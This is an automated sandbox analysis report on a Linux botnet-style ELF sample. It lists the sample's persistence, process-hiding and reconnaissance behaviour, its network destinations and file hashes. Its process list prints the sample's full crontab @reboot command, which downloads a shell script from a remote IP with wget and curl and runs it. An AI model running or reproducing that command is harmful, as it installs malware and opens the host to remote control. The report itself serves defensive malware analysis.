Analysis Overview
SHA256
2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661
Threat Level: Shows suspicious behavior
The file ccdcabc06ed12d315440fabad4c0e7a9.bin was found to show suspicious behavior.
Malicious Activity Summary
Changes its process name
Modifies Watchdog functionality
Creates/modifies Cron job
Creates/modifies environment variables
Enumerates active TCP sockets
Enumerates running processes
Modifies systemd
Modifies Bash startup script
Reads system network configuration
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-08 03:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-08 03:41
Reported
2024-01-08 03:44
Platform
ubuntu1804-amd64-20231215-en
Max time kernel
141s
Max time network
154s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.uIfVKk | /usr/bin/crontab | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | N/A | N/A |
Enumerates active TCP sockets
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | N/A | N/A |
Enumerates running processes
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /lib/systemd/system/bot.service | N/A | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | N/A | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/532/fd | N/A | N/A |
| File opened for reading | /proc/947/stat | N/A | N/A |
| File opened for reading | /proc/1065/stat | N/A | N/A |
| File opened for reading | /proc/170/stat | N/A | N/A |
| File opened for reading | /proc/168/cmdline | N/A | N/A |
| File opened for reading | /proc/265/stat | N/A | N/A |
| File opened for reading | /proc/1141/cmdline | N/A | N/A |
| File opened for reading | /proc/34/cmdline | N/A | N/A |
| File opened for reading | /proc/1519/stat | N/A | N/A |
| File opened for reading | /proc/1520/cmdline | N/A | N/A |
| File opened for reading | /proc/1557/stat | N/A | N/A |
| File opened for reading | /proc/156/stat | N/A | N/A |
| File opened for reading | /proc/78/fd | N/A | N/A |
| File opened for reading | /proc/1255/fd | N/A | N/A |
| File opened for reading | /proc/28/fd | N/A | N/A |
| File opened for reading | /proc/17/fd | N/A | N/A |
| File opened for reading | /proc/24/stat | N/A | N/A |
| File opened for reading | /proc/84/stat | N/A | N/A |
| File opened for reading | /proc/1547/fd | N/A | N/A |
| File opened for reading | /proc/1556/stat | N/A | N/A |
| File opened for reading | /proc/14/stat | N/A | N/A |
| File opened for reading | /proc/1111/cmdline | N/A | N/A |
| File opened for reading | /proc/1088/cmdline | N/A | N/A |
| File opened for reading | /proc/30/fd | N/A | N/A |
| File opened for reading | /proc/154/stat | N/A | N/A |
| File opened for reading | /proc/1136/stat | N/A | N/A |
| File opened for reading | /proc/1190/cmdline | N/A | N/A |
| File opened for reading | /proc/1290/fd | N/A | N/A |
| File opened for reading | /proc/27/stat | N/A | N/A |
| File opened for reading | /proc/82/fd | N/A | N/A |
| File opened for reading | /proc/162/fd | N/A | N/A |
| File opened for reading | /proc/171/stat | N/A | N/A |
| File opened for reading | /proc/1112/stat | N/A | N/A |
| File opened for reading | /proc/2/fd | N/A | N/A |
| File opened for reading | /proc/254/cmdline | N/A | N/A |
| File opened for reading | /proc/638/fd | N/A | N/A |
| File opened for reading | /proc/160/stat | N/A | N/A |
| File opened for reading | /proc/11/fd | N/A | N/A |
| File opened for reading | /proc/83/fd | N/A | N/A |
| File opened for reading | /proc/164/fd | N/A | N/A |
| File opened for reading | /proc/332/cmdline | N/A | N/A |
| File opened for reading | /proc/454/stat | N/A | N/A |
| File opened for reading | /proc/1124/fd | N/A | N/A |
| File opened for reading | /proc/1328/fd | N/A | N/A |
| File opened for reading | /proc/9/cmdline | N/A | N/A |
| File opened for reading | /proc/36/fd | N/A | N/A |
| File opened for reading | /proc/1539/stat | N/A | N/A |
| File opened for reading | /proc/34/stat | N/A | N/A |
| File opened for reading | /proc/662/stat | N/A | N/A |
| File opened for reading | /proc/26/fd | N/A | N/A |
| File opened for reading | /proc/163/stat | N/A | N/A |
| File opened for reading | /proc/711/cmdline | N/A | N/A |
| File opened for reading | /proc/1120/fd | N/A | N/A |
| File opened for reading | /proc/1164/stat | N/A | N/A |
| File opened for reading | /proc/1520/stat | N/A | N/A |
| File opened for reading | /proc/1552/cmdline | N/A | N/A |
| File opened for reading | /proc/10/fd | N/A | N/A |
| File opened for reading | /proc/460/cmdline | N/A | N/A |
| File opened for reading | /proc/952/cmdline | N/A | N/A |
| File opened for reading | /proc/1141/fd | N/A | N/A |
| File opened for reading | /proc/1460/fd | N/A | N/A |
| File opened for reading | /proc/1529/stat | N/A | N/A |
| File opened for reading | /proc/1527/fd | N/A | N/A |
| File opened for reading | /proc/79/cmdline | N/A | N/A |
Processes
/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
[/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot /bin/bash -c "/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh"") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/chmod
[chmod +x bins.sh]
/bin/sh
[sh bins.sh]
/bin/curl
[/bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh]
/bin/chmod
[chmod +x bins.sh]
/bin/sh
[sh bins.sh]
/bin/sh
[sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.2.49:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 89.187.167.3:443 | | tcp |
| US | 1.1.1.1:53 | apple.bbos.ink | udp |
| LT | 176.223.133.62:1290 | apple.bbos.ink | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
Files
/var/spool/cron/crontabs/tmp.uIfVKk
| MD5 | 2f16a50a03b078ad9d67f3835641e9fd |
| SHA1 | 8317001974fe8b4806e2377f4e62f9c74d588388 |
| SHA256 | 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f |
| SHA512 | 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85 |
/lib/systemd/system/bot.service
| MD5 | d77308e381db6ea7245af6f3b7be118e |
| SHA1 | 0a0f20a03f4db351a404954c780eebd15b3775bb |
| SHA256 | feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b |
| SHA512 | 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4 |